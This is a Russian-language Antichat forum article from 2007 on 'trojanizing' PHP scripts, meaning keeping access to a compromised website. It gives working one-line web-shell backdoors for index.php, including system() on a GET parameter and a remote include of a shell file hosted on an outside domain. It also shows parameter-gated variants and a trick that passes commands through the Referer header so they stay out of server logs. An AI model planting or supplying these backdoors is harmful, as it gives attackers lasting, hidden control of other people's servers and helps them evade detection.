ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Перезагрузить страницу Троянизация скриптов
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Троянизация скриптов
  #1  
Старый 09.01.2007, 18:29
Аватар для Goudini
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию Троянизация скриптов
Троянизация скриптов

В этой статье будут описаны методы троянизациии серверных скриптов, написанных на PHP.

=========
Вариант 1
=========

Началось всё с того что получив шелл на сайте, я захотел как-то закрепиться и добавил в
index.php код такого содержания
PHP код:
<?php system($_GET["cmd"]) ?>
Вскоре полноценный шелл был удалён, остался только указанный выше.
Я попробовал залить полноценный, но оказалось что на серваке нет ни wget, curl, etc....

=========
Вариант 2
=========

Тогда почему же не индклудить шелл каждый раз при загрузке страници
PHP код:
<?php include("http://gaga.phpnet.us/shell.txt"); ?>
Лучше инклудить шелл, только при определенный параметрах. Сделаем более интерактивнее :
PHP код:
<?php if(@$_GET["hack"] == "yes") include($_GET['file']); ?>
При переходе по адресу, указанному ниже мы получим удаллённый шелл
Код:
http://[сайт]/index.php?hack=yes&file=[шелл]
=========
Вариант 3
=========

А что если мы протроянили скрипты таким способом, а на сервере allow_url_fopen = Off;
Тогда используем такую конструкцию :
PHP код:
<?php if(ini_get('allow_url_fopen')) include ($_GET["file"]); else system($_GET["cmd"]); ?>
У нас есть и удаленный шелл, и командная строка. Можно ещё проверить разрешены ли функции
exec(), system(), passthru(), но это увеличит размер.
Добавим авторизацию:
PHP код:
<?php if(@$_GET["hack"] == "yes") if(ini_get('allow_url_fopen')) include ($_GET["file"]); else system($_GET["cmd"]); ?>
=========
Вариант 4
=========

В приведенных выше примерах данные передаються через адресную строку браузера.
Чтобы в логах не было видно всех параметров, изменим немного исходники
PHP код:
<?php if(ini_get('allow_url_fopen')) include ($_SERVER["HTTP_REFERER"]); else system($_SERVER["HTTP_REFERER"]); ?>
В реферере, в зависимости от настроек php.ini, будет адрес шелла, или системная команда.

=========
Заключение
=========

Для изменения заголовков на лету можно использовать програму HTTPSubstitute от Zadoxlik'a
http://forum.antichat.ru/thread23569.html
Примеры скрытия Php кода опсаны в статье Great'a
http://forum.antichat.ru/thread28246.html
Последний раз редактировалось Goudini; 14.01.2007 в 20:37.. Причина: гггг
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Средства тестирования скриптов. madnet ПО для Web разработчика 3 07.11.2006 00:32
Создание скриптов Nova Разное - Покупка, продажа, обмен 2 04.08.2006 17:09
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30
Посоветуйте способы уменьшения объема скриптов DizzZ PHP, PERL, MySQL, JavaScript 8 27.01.2006 13:33



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ